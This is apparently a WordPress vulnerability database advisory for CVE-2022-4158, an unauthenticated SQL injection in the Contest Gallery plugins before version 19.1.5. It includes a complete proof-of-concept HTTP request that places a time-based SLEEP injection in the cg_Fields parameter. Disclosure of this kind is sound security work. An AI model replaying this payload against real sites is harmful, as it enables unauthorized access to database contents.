WordPress Plugin Vulnerabilities

Contest Gallery < 19.1.5 - Unauthenticated SQL Injection

Description

The plugins do not escape the cg_Fields POST parameter before concatenating it to an SQL query in users-registry-check-registering-and-login.php. This may allow malicious visitors to leak sensitive information from the site's database.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961
Content-Length: 3796
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/?p=1
Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_current_page_id"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_check"

63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="action"

post_cg_registry
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_gallery_id_registry"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Form_Input_ID]"

1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Type]"

user-check-agreement-field					
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Form_Input_ID]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Type]"

main-nick-name
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Form_Input_ID]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Type]"

main-mail
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Order]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Content]"

ds@g.com
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Form_Input_ID]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Type]"

password
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Order]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Form_Input_ID]"

5
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Type]"

password-confirm
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Order]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-mail"

ds@g.com
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-user-name"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-nick-name"

testing
-----------------------------22204028416237992052154109961--

Affects Plugins

Plugin icon
contest-gallery
Fixed in 19.1.5
Plugin icon
contest-gallery-pro
Fixed in 19.1.5

References

CVE
CVE-2022-4158
URL
https://bulletin.iese.de/post/contest-gallery_19-1-4-1_15

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Submitter
Daniel Krohmer
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
1b3b51af-ad73-4f8e-ba97-375b8a363b64

Timeline

Publicly Published
2022-12-05 (about 1 years ago)
Added
2022-12-05 (about 1 years ago)
Last Updated
2022-12-05 (about 1 years ago)

Other

Published
Title
Published
2021-10-07
Title
Schreikasten <= 0.14.18 - Author+ SQL Injections
Published
2021-02-08
Title
Data Tables Generator by Supsystic < 1.10.0 - Authenticated SQL Injection
Published
2024-04-22
Title
ARforms < 6.4.1 - Authenticated (Subscriber+) SQL Injection
Published
2020-02-10
Title
Participants Database < 1.9.5.6 - Authenticated Time Based SQL Injection
Published
2014-08-01
Title
store-locator-le - SQL Injection